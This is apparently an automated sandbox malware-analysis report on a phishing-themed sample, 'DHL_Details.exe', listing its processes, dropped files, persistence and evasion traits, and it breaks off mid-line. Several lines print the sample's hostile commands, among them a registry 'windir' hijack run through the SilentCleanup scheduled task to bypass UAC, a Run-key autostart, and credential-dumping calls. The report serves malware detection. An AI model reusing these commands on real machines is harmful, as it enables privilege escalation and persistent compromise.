Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Xgku\Xgku.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe'
Source: unknownProcess created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Xgku\Xgku.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe'
Source: unknownProcess created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\cqdcbkuplxulphbpupahet'
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\mkjnccfrzfmqzvxtdzmihgnrtw'
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\pmofdvqknoedbblxukhcslhaucuaa'
Source: C:\Users\user\Desktop\DHL_Details.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' 'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\cqdcbkuplxulphbpupahet'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\mkjnccfrzfmqzvxtdzmihgnrtw'Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\pmofdvqknoedbblxukhcslhaucuaa'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe' Jump to behavior
Source: C:\Users\user\Xgku\Xgkuest.exeProcess created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\Xgku\Xgkuest.exe 'C:\Users\user\Xgku\Xgkuest.exe' Jump to behavior
Source: C:\Users\user\Xgku\Xgkuest.exeProcess created: C:\Users\user\Xgku\Xgkuees.exe Xgkuees.exeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeWindow found: window name: TMainFormJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Submission file is bigger than most known malware samplesShow sources
Source: DHL_Details.exeStatic file information: File size 1390594 > 1048576

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\DHL_Details.exeUnpacked PE file: 0.2.DHL_Details.exe.10530000.7.unpack
Source: C:\Users\user\Xgku\Xgkuees.exeUnpacked PE file: 11.2.Xgkuees.exe.10530000.5.unpack
Source: C:\Users\user\Xgku\Xgkuees.exeUnpacked PE file: 15.2.Xgkuees.exe.10530000.5.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F88B GdiplusStartup,LoadLibraryA,GetProcAddress,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,_itoa,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040F88B
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A9251 push 004551ECh; ret 0_3_023A92F1
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A9305 push 00455288h; ret 0_3_023A938D
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023683F5 push ecx; mov dword ptr [esp], edx0_3_023683FA
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0237D0FD push 0042843Ch; ret 0_3_0237D141
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_02366151 push 004114BAh; ret 0_3_023661BF
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A91B9 push 00455125h; ret 0_3_023A922A
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0237C1A1 push 004274EEh; ret 0_3_0237C1F3
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0237C1FD push 00427528h; ret 0_3_0237C22D
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_02370671 push 0041BA0Fh; ret 0_3_02370714
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_02368651 push ecx; mov dword ptr [esp], edx0_3_02368656
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0237C649 push 00427968h; ret 0_3_0237C66D
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A769D push 00452A06h; ret 0_3_023A770B
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A96DD push 0045565Dh; ret 0_3_023A9762
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_02368771 push ecx; mov dword ptr [esp], edx0_3_02368776
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0235B75D push 00406AABh; ret 0_3_0235B7B0
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023687B5 push ecx; mov dword ptr [esp], edx0_3_023687BA
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0237840D push 004237D0h; ret 0_3_023784D5
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A74BD push 004527E3h; ret 0_3_023A74E8
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A74F5 push 0045282Bh; ret 0_3_023A7530
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0235C50D push 00407842h; ret 0_3_0235C547
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A85A5 push 004538E3h; ret 0_3_023A85E8
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_023A7585 push 004528C4h; ret 0_3_023A75C9
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_0237AA85 push 00425DC7h; ret 0_3_0237AACC
Source: C:\Users\user\Desktop\DHL_Details.exeCode function: 0_3_02366AF9 push 00411E39h; ret 0_3_02366B3E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_3_066E8568 push 9D9AEB5Ch; iretd 2_3_066E856D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_3_066E8514 push ds; ret 2_3_066E8523
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00404C30 push 00404EDCh; ret 10_2_00404ED4
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00404898 push 004048E9h; ret 10_2_004048E1
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00408164 push 004082E0h; ret 10_2_004082D8
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_0040A5D9 pushad ; retf 10_2_0040A61D
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00402E0C push eax; ret 10_2_00402E48

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Contains functionality to download and launch executablesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D427 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040D427
Drops PE filesShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeFile created: C:\Users\user\Xgku\Xgkuees.exeJump to dropped file
Source: C:\Users\user\Desktop\DHL_Details.exeFile created: C:\Users\user\Xgku\Xgkuest.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start windows servicesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_004111A9
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XgkuJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XgkuJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,12_2_004099CD
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Yara detected Windows Security DisablerShow sources
Source: Yara matchFile source: 00000000.00000002.1152780364.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1153575673.0000000004251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1212711841.0000000004710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1185528886.0000000004238000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1152646901.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1212275886.00000000043A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1184301270.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Xgkuees.exe PID: 4204, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Xgkuees.exe PID: 4732, type: MEMORY
Source: Yara matchFile source: Process Memory Space: DHL_Details.exe PID: 5472, type: MEMORY
Source: Yara matchFile source: C:\Users\Public\Yako.bat, type: DROPPED
Source: Yara matchFile source: 15.2.Xgkuees.exe.4710000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.DHL_Details.exe.2b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 11.2.Xgkuees.exe.2920000.3.raw.unpack, type: UNPACKEDPE
Contains functionality to enumerate running servicesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00410E72
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeWindow / User API: threadDelayed 3254Jump to behavior
Found evaded block containing many API callsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeEvaded block: after key decisiongraph_12-15058
Found large amount of non-executed APIsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 1.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4116Thread sleep count: 3254 > 30Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4116Thread sleep time: -32540000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 3660Thread sleep time: -36000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4516Thread sleep count: 113 > 30Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4516Thread sleep time: -113000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4836Thread sleep count: 139 > 30Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 4836Thread sleep time: -139000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040504A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040506Fh12_2_0040504A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040504A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040506Fh12_2_0040504A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_105369D8 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 105369FDh12_2_105369D8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_105369D8 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 105369FDh12_2_105369D8
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Xgku\Xgkuest.exeCode function: 10_2_00404268 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404268
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hst